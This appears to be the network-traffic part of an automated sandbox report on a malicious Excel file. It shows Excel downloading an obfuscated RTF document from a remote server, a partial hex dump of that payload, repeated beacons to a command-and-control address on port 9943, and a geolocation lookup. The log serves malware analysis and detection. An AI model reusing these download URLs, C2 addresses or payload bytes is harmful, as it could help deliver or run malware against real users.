Jul 5, 2024 07:16:48.121918917 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.121932983 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.121953011 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.121992111 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.122191906 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.122203112 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.122217894 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.122229099 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.122240067 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.122250080 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.122261047 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.122272968 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.122275114 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.122286081 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.122292995 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.122378111 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.122625113 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.122637033 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.122648001 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.122685909 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.122852087 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.122864008 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.122874975 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.122996092 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123001099 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.123008013 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123020887 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123034954 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123040915 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.123161077 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.123198032 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123209000 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123228073 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123239994 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123249054 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.123250961 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123264074 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123271942 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.123277903 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123292923 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123374939 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.123696089 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123707056 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123722076 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123744011 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.123765945 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.123785019 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123795986 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123811007 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123828888 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.123976946 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123986959 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.123996019 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.124018908 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.124028921 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.124038935 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.124043941 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.124051094 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.124072075 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.124142885 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.124383926 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.124491930 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.124504089 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.124514103 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.124526978 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.124537945 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.124548912 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.124558926 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.124560118 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.124584913 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.124877930 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.189073086 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189091921 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189104080 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189121008 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189165115 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189189911 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.189189911 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.189249039 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189260960 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189389944 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189399958 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189419031 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189433098 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189454079 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.189487934 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.189523935 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189537048 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189616919 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189629078 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189683914 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.189754009 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189765930 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189774990 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189775944 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.189788103 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189805031 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189810991 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.189902067 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.189913988 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.189934969 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.189935923 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.190026045 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.190037012 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.190047026 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.190047026 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.190144062 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.190174103 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.190193892 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.190408945 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.641720057 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:16:48.647128105 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:16:48.647201061 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:16:48.657679081 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:16:48.662476063 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:16:48.752585888 CEST	49178	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:48.762147903 CEST	80	49178	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:48.762218952 CEST	49178	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:48.762304068 CEST	49178	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:48.769491911 CEST	80	49178	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:48.780314922 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:48.780385017 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.784018993 CEST	49178	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:48.790000916 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:48.790066957 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:48.790441036 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:48.790486097 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:48.837655067 CEST	80	49178	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:49.207289934 CEST	80	49178	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:49.207340956 CEST	49178	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:49.390717983 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:16:49.555841923 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:16:49.555913925 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:16:49.560009003 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:16:49.564815044 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:16:49.564868927 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:16:49.569674969 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:16:50.029890060 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:16:50.031856060 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:16:50.036951065 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:16:50.196365118 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:16:50.425385952 CEST	49179	80	192.168.2.22	178.237.33.50
Jul 5, 2024 07:16:50.431889057 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:16:50.432187080 CEST	80	49179	178.237.33.50	192.168.2.22
Jul 5, 2024 07:16:50.432954073 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:16:50.432970047 CEST	49179	80	192.168.2.22	178.237.33.50
Jul 5, 2024 07:16:50.433237076 CEST	49179	80	192.168.2.22	178.237.33.50
Jul 5, 2024 07:16:50.440268040 CEST	80	49179	178.237.33.50	192.168.2.22
Jul 5, 2024 07:16:51.064069986 CEST	80	49179	178.237.33.50	192.168.2.22
Jul 5, 2024 07:16:51.064145088 CEST	49179	80	192.168.2.22	178.237.33.50
Jul 5, 2024 07:16:51.072377920 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:16:51.077263117 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:16:52.064012051 CEST	80	49179	178.237.33.50	192.168.2.22
Jul 5, 2024 07:16:52.064079046 CEST	49179	80	192.168.2.22	178.237.33.50
Jul 5, 2024 07:16:52.178056002 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:16:52.180008888 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:16:52.184808969 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:17:22.179302931 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:17:22.181031942 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:17:22.185982943 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:17:52.182758093 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:17:52.185043097 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:17:52.189918041 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:17:58.126777887 CEST	49179	80	192.168.2.22	178.237.33.50
Jul 5, 2024 07:17:58.500875950 CEST	49179	80	192.168.2.22	178.237.33.50
Jul 5, 2024 07:17:59.109258890 CEST	49179	80	192.168.2.22	178.237.33.50
Jul 5, 2024 07:18:00.310472965 CEST	49179	80	192.168.2.22	178.237.33.50
Jul 5, 2024 07:18:02.712881088 CEST	49179	80	192.168.2.22	178.237.33.50
Jul 5, 2024 07:18:07.534859896 CEST	49179	80	192.168.2.22	178.237.33.50
Jul 5, 2024 07:18:17.131086111 CEST	49179	80	192.168.2.22	178.237.33.50
Jul 5, 2024 07:18:19.592197895 CEST	49172	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:18:19.592263937 CEST	49166	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:18:19.597445011 CEST	80	49166	172.67.148.197	192.168.2.22
Jul 5, 2024 07:18:19.597512007 CEST	49166	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:18:19.966509104 CEST	49172	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:18:20.668514967 CEST	49172	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:18:21.869719982 CEST	49172	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:18:22.188726902 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:18:22.190270901 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:18:22.195429087 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:18:24.365720034 CEST	49172	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:18:29.170542955 CEST	49172	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:18:30.605998039 CEST	49167	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:18:36.003979921 CEST	49169	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:18:38.780163050 CEST	49172	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:18:52.183737040 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:18:52.186696053 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:18:52.193798065 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:19:22.291348934 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:19:22.315567970 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:19:22.320374966 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:19:52.187649965 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:19:52.193078041 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:19:52.197916985 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:20:22.189980030 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:20:22.194720984 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:20:22.199587107 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:20:52.191190004 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:20:52.194580078 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:20:52.199424982 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:21:22.192826986 CEST	9943	49177	216.9.224.18	192.168.2.22
Jul 5, 2024 07:21:22.194513083 CEST	49177	9943	192.168.2.22	216.9.224.18
Jul 5, 2024 07:21:22.199409962 CEST	9943	49177	216.9.224.18	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 5, 2024 07:16:25.059971094 CEST	54562	53	192.168.2.22	8.8.8.8
Jul 5, 2024 07:16:25.084700108 CEST	53	54562	8.8.8.8	192.168.2.22
Jul 5, 2024 07:16:29.414139986 CEST	52917	53	192.168.2.22	8.8.8.8
Jul 5, 2024 07:16:29.438906908 CEST	53	52917	8.8.8.8	192.168.2.22
Jul 5, 2024 07:16:30.608361006 CEST	62751	53	192.168.2.22	8.8.8.8
Jul 5, 2024 07:16:30.633470058 CEST	53	62751	8.8.8.8	192.168.2.22
Jul 5, 2024 07:16:30.635890961 CEST	57893	53	192.168.2.22	8.8.8.8
Jul 5, 2024 07:16:30.661261082 CEST	53	57893	8.8.8.8	192.168.2.22
Jul 5, 2024 07:16:35.998002052 CEST	54821	53	192.168.2.22	8.8.8.8
Jul 5, 2024 07:16:36.004949093 CEST	53	54821	8.8.8.8	192.168.2.22
Jul 5, 2024 07:16:36.009591103 CEST	54719	53	192.168.2.22	8.8.8.8
Jul 5, 2024 07:16:36.035923004 CEST	53	54719	8.8.8.8	192.168.2.22
Jul 5, 2024 07:16:50.392333984 CEST	49881	53	192.168.2.22	8.8.8.8
Jul 5, 2024 07:16:50.410068035 CEST	53	49881	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 5, 2024 07:16:25.059971094 CEST	192.168.2.22	8.8.8.8	0x42	Standard query (0)	woi.gg	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:29.414139986 CEST	192.168.2.22	8.8.8.8	0x6d7e	Standard query (0)	woi.gg	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:30.608361006 CEST	192.168.2.22	8.8.8.8	0x620d	Standard query (0)	woi.gg	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:30.635890961 CEST	192.168.2.22	8.8.8.8	0xf3f1	Standard query (0)	woi.gg	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:35.998002052 CEST	192.168.2.22	8.8.8.8	0x1100	Standard query (0)	woi.gg	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:36.009591103 CEST	192.168.2.22	8.8.8.8	0x2664	Standard query (0)	woi.gg	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:50.392333984 CEST	192.168.2.22	8.8.8.8	0x4f0a	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 5, 2024 07:16:25.084700108 CEST	8.8.8.8	192.168.2.22	0x42	No error (0)	woi.gg	104.21.11.106	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:25.084700108 CEST	8.8.8.8	192.168.2.22	0x42	No error (0)	woi.gg	172.67.148.197	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:29.438906908 CEST	8.8.8.8	192.168.2.22	0x6d7e	No error (0)	woi.gg	172.67.148.197	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:29.438906908 CEST	8.8.8.8	192.168.2.22	0x6d7e	No error (0)	woi.gg	104.21.11.106	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:30.633470058 CEST	8.8.8.8	192.168.2.22	0x620d	No error (0)	woi.gg	172.67.148.197	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:30.633470058 CEST	8.8.8.8	192.168.2.22	0x620d	No error (0)	woi.gg	104.21.11.106	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:30.661261082 CEST	8.8.8.8	192.168.2.22	0xf3f1	No error (0)	woi.gg	172.67.148.197	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:30.661261082 CEST	8.8.8.8	192.168.2.22	0xf3f1	No error (0)	woi.gg	104.21.11.106	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:36.004949093 CEST	8.8.8.8	192.168.2.22	0x1100	No error (0)	woi.gg	172.67.148.197	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:36.004949093 CEST	8.8.8.8	192.168.2.22	0x1100	No error (0)	woi.gg	104.21.11.106	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:36.035923004 CEST	8.8.8.8	192.168.2.22	0x2664	No error (0)	woi.gg	104.21.11.106	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:36.035923004 CEST	8.8.8.8	192.168.2.22	0x2664	No error (0)	woi.gg	172.67.148.197	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:16:50.410068035 CEST	8.8.8.8	192.168.2.22	0x4f0a	No error (0)	geoplugin.net	178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

woi.gg

172.232.56.138

91.92.254.14

91.92.254.194

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49163	104.21.11.106	80	1892	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 07:16:25.095359087 CEST	319	OUT	GET /1RxrR6 HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: woi.gg Connection: Keep-Alive
Jul 5, 2024 07:16:25.598357916 CEST	830	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 05 Jul 2024 05:16:25 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 05 Jul 2024 06:16:25 GMT Location: https://woi.gg/1RxrR6 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2BdFv9%2B4I9IIYcHqnzNN59%2BMhuUPJyWkm6Sqp%2FQypDCb3H5CTqsSbUnSekvpXIa7SOq2hMGJCIHUj676FEePy3HE0PnxyCsYYUlK2h%2BCJf0VHwc4uAj8CAk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 89e4e2039f7c435d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49165	172.232.56.138	80	1892	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 07:16:27.605067968 CEST	345	OUT	GET /xampp/hu/hu.hu.huhuh.doc HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 172.232.56.138 Connection: Keep-Alive
Jul 5, 2024 07:16:28.253381968 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 05 Jul 2024 05:16:28 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Thu, 04 Jul 2024 07:44:35 GMT ETag: "1478b-61c671e4a808e" Accept-Ranges: bytes Content-Length: 83851 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword Data Raw: 7b 5c 72 74 66 31 0d 09 09 09 7b 5c 2a 5c 6d 7a 65 72 6f 44 65 73 63 34 32 35 33 37 34 33 38 34 20 5c 3b 7d 0d 7b 5c 38 32 35 35 30 35 39 36 37 27 2c 5b 29 3f 38 38 2e 33 2b 3b 36 2e 35 36 21 25 2a 3c 27 3e 2b 35 7c 30 3f 7e 40 3f 2d 7e 2a 21 2b 2a 21 36 3f 39 37 2d 26 36 25 3d 5b 60 39 29 3f 35 2f 3a 24 5b 5b 21 5b 25 3f 7e 5b 3b 30 7c 36 31 3b 31 33 3f 37 30 31 2b 21 25 37 2a 2c 3a 32 35 3d 5e 2f 40 3f 35 7c 2e 28 b5 5d 7c 3c 32 3f 2c 30 3d 3b 37 29 2a 29 3f 25 2e 36 21 3c 5b 5f 3f 38 5e 39 3b 3b 7c 3f 7e 30 33 5f 24 32 30 2e 40 b0 28 3c 21 33 25 3f b5 2a b5 26 2e 7c 5d 38 39 7c 39 38 3f a7 2f 23 2b 3f 23 21 24 5b 3f 32 31 3f 5b 3a 3d 3f 21 2e 26 26 3e 35 36 5b 29 27 34 3c 3f 26 5f 7c 3b 3d b0 2f 21 3c 21 3f 2c 3f 3e 3f 60 36 2d 2d 33 3f 2c 5f 38 38 a7 2f 3f 3f 2c 5b 31 3c 39 38 23 2f 2b 3f 30 25 7c 3b 5d 26 27 3b 5d 21 7c 3c 3b 30 24 3f 3f 31 3f 31 3f 28 60 7e 21 24 39 60 2a 36 38 37 31 23 31 b0 7c 3c 25 25 34 5b 2b 2c b5 5e 38 a7 2f 60 36 3c 5d 5f 36 2b 3f 3f 23 2f b5 3f 28 31 7c 24 a7 37 7c 2f [TRUNCATED] Data Ascii: {\rtf1{\\mzeroDesc425374384 